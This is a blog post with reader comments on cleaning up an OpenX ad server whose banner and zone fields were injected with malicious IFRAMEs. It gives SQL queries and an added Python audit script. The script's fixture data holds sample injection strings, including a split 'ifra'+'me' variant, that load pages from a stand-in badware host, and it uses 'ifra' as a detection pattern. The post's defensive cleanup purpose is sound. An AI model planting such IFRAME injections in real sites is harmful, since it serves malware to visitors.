OpenX Vulnerability: “This Site May Harm Your Computer”

August 6th, 2010

09/16/2010 Update: This post has been updated after another security hole was discovered in OpenX, allowing attackers to inject malicious code again.

Yesterday I got multiple emails from Google regarding some of my websites that were supposedly pushing malware (or badware, whatever you want to call it) to visitors’ computers:

Malware notification regarding www.mywebsite.com

Dear site owner or webmaster of mywebsite.com,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

www.mywebsite.com

Here is a link to a sample warning page:

http://www.google.com/interstitial?url=www.mywebsite.com

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:

http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.

At first I wasn’t even sure of the legitimacy of the emails, so I went to my Google Webmaster Tools account, where I found out the warnings were genuine.

Fortunately, Google gave me a few hints as to which code was suspicious, which is how I found out it was due to OpenX. And as I use a single OpenX server to serve ads on all my websites, Google flagged almost all of them as harmful. Within an hour, I went from 30,000+ visitors a day to almost nothing.

What Happened

I hadn’t updated OpenX in a while and was running version 2.8.1. This version is vulnerable to an attack in which an IFRAME pointing at a badware site is injected into the code OpenX wraps around each banner (the append and prepend fields of the banners and zones), so every page that displays an ad from the server also loads content from that site.

By using phpMyAdmin, I quickly found out which banners and zones were affected. Note that the pattern is 'ifra' rather than 'iframe': the later injections split the tag into “ifra” and “me” (for example by concatenating two strings in JavaScript), and the shorter pattern still catches those:

SELECT * FROM ox_banners WHERE append LIKE '%ifra%'
OR prepend LIKE '%ifra%';
SELECT * FROM ox_zones WHERE append LIKE '%ifra%'
OR prepend LIKE '%ifra%';

How to Fix This

First of all, get the latest version of OpenX and upgrade it. Next, if you’re sure you’ve never used any “append” or “prepend” code in any of your banners or zones, back up the two tables and then simply issue these two SQL queries using phpMyAdmin:

UPDATE ox_banners SET append = null, prepend = null
WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';
UPDATE ox_zones SET append = null, prepend = null
WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';

Otherwise you’ll have to edit each affected banner and zone entry manually, through either OpenX or phpMyAdmin, to remove the malicious code while keeping your own.

Once you’ve cleaned up everything, delete the banner cache so the cleaned banners are re-rendered. You can do this with an FTP client by deleting everything in /[openx directory]/var/cache/

And finally you need to submit a review request to Google so that the warning is removed from your site. This is done through Google Webmaster Tools, using the link you got in the warning email.
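As an added example (not code from this post, its author or the OpenX project), the script below performs the audit and cleanup described above against an in-memory SQLite stand-in for the OpenX MySQL database. The table and column names ox_banners, ox_zones, append and prepend come from the queries in the post; the ox_users columns, the sample rows, the badware.example URLs and the cache directory path are assumptions made for the example. It searches for the 'ifra' fragment so the split “ifra”+“me” variant is caught too, blanks only the column that actually matched (narrower than the post’s UPDATE, which blanks both), and also lists accounts not on an allowlist, since the comments below report a rogue admin user that kept re-infecting patched installs.

```python
"""Audit and clean an OpenX 2.8.x database for injected IFRAME code.

Added example, not the blog author's or OpenX's code. An in-memory SQLite
database with constructed sample rows stands in for the real MySQL tables;
swap the connection for a MySQL client to run it against a live server.
"""
import os
import sqlite3

# Fragment searched for in append/prepend. 'ifra' (not 'iframe') also catches
# the split-string trick reported in the comments: '<ifra' + 'me src=...'.
INJECTION_MARKERS = ("ifra",)

# Table -> primary-key column. Fixed allowlist, so the f-strings below never
# interpolate untrusted input into SQL identifiers.
TABLES = {"ox_banners": "bannerid", "ox_zones": "zoneid"}

SAMPLE_SCHEMA = """
CREATE TABLE ox_banners (bannerid INTEGER PRIMARY KEY, description TEXT,
                         append TEXT, prepend TEXT);
CREATE TABLE ox_zones   (zoneid INTEGER PRIMARY KEY, zonename TEXT,
                         append TEXT, prepend TEXT);
CREATE TABLE ox_users   (user_id INTEGER PRIMARY KEY, username TEXT,
                         email_address TEXT);
"""

# Constructed sample data (assumed, not taken from a real compromise): a clean
# banner, a plain IFRAME injected into prepend, the 'ifra'+'me' split injected
# into append, one infected zone, and a rogue user like the reported 'temp2'.
SAMPLE_ROWS = [
    ("INSERT INTO ox_banners VALUES (?,?,?,?)", [
        (1, "Clean banner", None, None),
        (2, "Hit 1", None,
         '<iframe src="http://badware.example/x.php" width=1 height=1></iframe>'),
        (3, "Hit 2",
         "<script>document.write('<ifra'+'me src=\"http://badware.example/y\">"
         "</ifra'+'me>')</script>", None),
    ]),
    ("INSERT INTO ox_zones VALUES (?,?,?,?)", [
        (10, "Sidebar", '<iframe src="http://badware.example/z"></iframe>', None),
        (11, "Header", None, None),
    ]),
    ("INSERT INTO ox_users VALUES (?,?,?)", [
        (1, "admin", "webmaster@mywebsite.example"),
        (2, "temp2", "asd@asd.com"),
    ]),
]


def connect_sample():
    """Build the stand-in database and return a connection to it."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    for sql, rows in SAMPLE_ROWS:
        conn.executemany(sql, rows)
    conn.commit()
    return conn


def find_injected(conn):
    """Return [(table, row_id, column, snippet)] for every append/prepend
    value containing an injection marker; mirrors the post's SELECT queries.
    LIKE is case-insensitive for ASCII in both SQLite and default MySQL."""
    hits = []
    for table, id_col in TABLES.items():
        for column in ("append", "prepend"):
            where = " OR ".join(f"{column} LIKE ?" for _ in INJECTION_MARKERS)
            params = [f"%{m}%" for m in INJECTION_MARKERS]
            sql = f"SELECT {id_col}, {column} FROM {table} WHERE {where}"
            for row_id, value in conn.execute(sql, params):
                hits.append((table, row_id, column, value[:60]))
    return hits


def clean_injected(conn, hits):
    """NULL out only the matched column of each hit, leaving any legitimate
    code in the other column intact. Returns the number of rows changed."""
    changed = 0
    for table, row_id, column, _ in hits:
        sql = f"UPDATE {table} SET {column} = NULL WHERE {TABLES[table]} = ?"
        changed += conn.execute(sql, (row_id,)).rowcount
    conn.commit()
    return changed


def unexpected_users(conn, known_usernames):
    """Return (username, email) for accounts not on the allowlist, so a
    backdoor account survives neither the upgrade nor this cleanup."""
    rows = conn.execute("SELECT user_id, username, email_address FROM ox_users")
    return [(u, e) for _, u, e in rows if u not in known_usernames]


def clear_cache(cache_dir):
    """Delete the files in OpenX's var/cache directory (path is assumed) so
    cleaned banners are regenerated. Returns the number of files removed."""
    removed = 0
    for name in os.listdir(cache_dir):
        path = os.path.join(cache_dir, name)
        if os.path.isfile(path):
            os.remove(path)
            removed += 1
    return removed


if __name__ == "__main__":
    db = connect_sample()
    found = find_injected(db)
    for hit in found:
        print("injected:", hit)
    print("rows cleaned:", clean_injected(db, found))
    print("still injected:", find_injected(db))
    print("unexpected users:", unexpected_users(db, {"admin"}))
```

Run it once in report-only mode (call find_injected and unexpected_users, skip clean_injected) before touching a production database, and keep the table backup the post recommends: the marker list only covers the IFRAME family of injections seen here, so anything it reports as clean still deserves a manual look at the append and prepend fields.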

17 responses so far ↓


1. Response by : Dony on Aug 19, 2010 at 11:09 am

I had the same bug. How to prevent it?


2. Response by : The Web Hosting Hero on Aug 19, 2010 at 11:10 am

Make sure you update OpenX to the latest version.


3. Response by : Jerry on Sep 10, 2010 at 3:07 am

you can also password protect your www/admin folder


4. Response by : Derrick Threatt on Sep 16, 2010 at 7:37 am

They got smart… now they change it…. iframe won’t work… they split the words…

so now it’s “ifra” “me”

so now change %iframe% to %/ifra%


5. Response by : Derrick Threatt on Sep 16, 2010 at 7:44 am

OH wow… now you have to run this on ox_zones and ox_banners. they’ve infected both tables


6. Response by : The Web Hosting Hero on Sep 16, 2010 at 8:30 am

Thank you Derrick, I will update this post accordingly!

7. Response by : OpenX Security Update 2.8.7 on Sep 16, 2010 at 9:01 am

[...] 16th, 2010 · No Comments Just over a month ago, I made a post about our OpenX server being hacked, pushing malware to visitors’ computers and how to fix it. Unfortunately, hackers found a way [...]


8. Response by : Derrick Threatt on Sep 17, 2010 at 1:26 pm

Looks like it created an admin user too, called temp2, with the email address asd@asd.com. You might want to delete that too, because my site got reinfected today.


9. Response by : Chris on Sep 18, 2010 at 1:19 am

How did it get reinfected if you’re up to date? I had the same problem with the temp2 account. What did you end up doing to secure it?


10. Response by : Derrick Threatt on Sep 18, 2010 at 8:01 am

The 2.8.7 patch fixed the vulnerability that allowed creating the admin account but doesn’t fix the damage… so you have to manually delete that account or the malware can keep coming in through the door it created, even though the fix is installed. Now that I have deleted that account I am good to go.


11. Response by : Uno on Sep 28, 2010 at 4:59 am

We’re moving away from Openx because of this. It’s a mission to fix and it doesn’t seem OpenX is serious about it. It’s happened about 3 times to us. Now we’ve upgraded, applied all the security measures and it still happened.

Cheers openx!


12. Response by : Jack Yan on Oct 26, 2010 at 12:48 am

Thank you, everyone, for your feedback. We got hit over the weekend. Incidentally, I wonder if the htaccess method described on this page would work. I’ve implemented it—now, it’s a game of wait and see.

http://forum.openx.org/index.php?showtopic=503453491&st=15&gopid=275381


13. Response by : Ilya Ber on Nov 4, 2010 at 11:58 am

Guys and girls,

Don’t forget to remove the “temp” users from the ox_users table, otherwise the injections will continue even with the upgraded OpenX.


14. Response by : Ivan on Nov 25, 2010 at 5:32 am

Hey guys, I need help. Can someone tell me how to prevent worthless links from OpenX to my site? I have 15,000 links, but they are nofollow or something like that. Can this have a negative impact on my website with Google? Thank you!


15. Response by : Jack Yan on Nov 25, 2010 at 3:57 pm

Hi Ivan: my reply is not going to be too helpful because I don’t know how to remove those links, or even how they came about, but if they look automated, I would say that, almost certainly, Google will penalize you.

Are you saying the links are coming from your OpenX install on your own server, or are they coming from OpenX’s own website?


16. Response by : Ivan on Nov 26, 2010 at 2:43 am

Dear Jack, thank you for responding. The links are coming from OpenX installed on our subdomain. We have an OpenX channel called “channel north croatia” and have gathered 5 news portals from our region, and we have banners on each site. When they put up a new article, we automatically receive a new backlink. Do we need to move OpenX to another server, or does OpenX have some option for excluding these links? Or something like that? Thank you again.


17. Response by : Filippo Ronco on Dec 3, 2010 at 3:05 pm

A big question I can’t figure out:

Once you’ve asked Google to review your site and they give you the green light for the URL where you’ve installed the ad server, will all the other URLs of the websites in the network be updated in an “auto-cascade” mode, or do they need to request a malware review one by one anyway?

Thanks a lot.

Filippo

© Copyright 2012 - TheWebHostingHero.com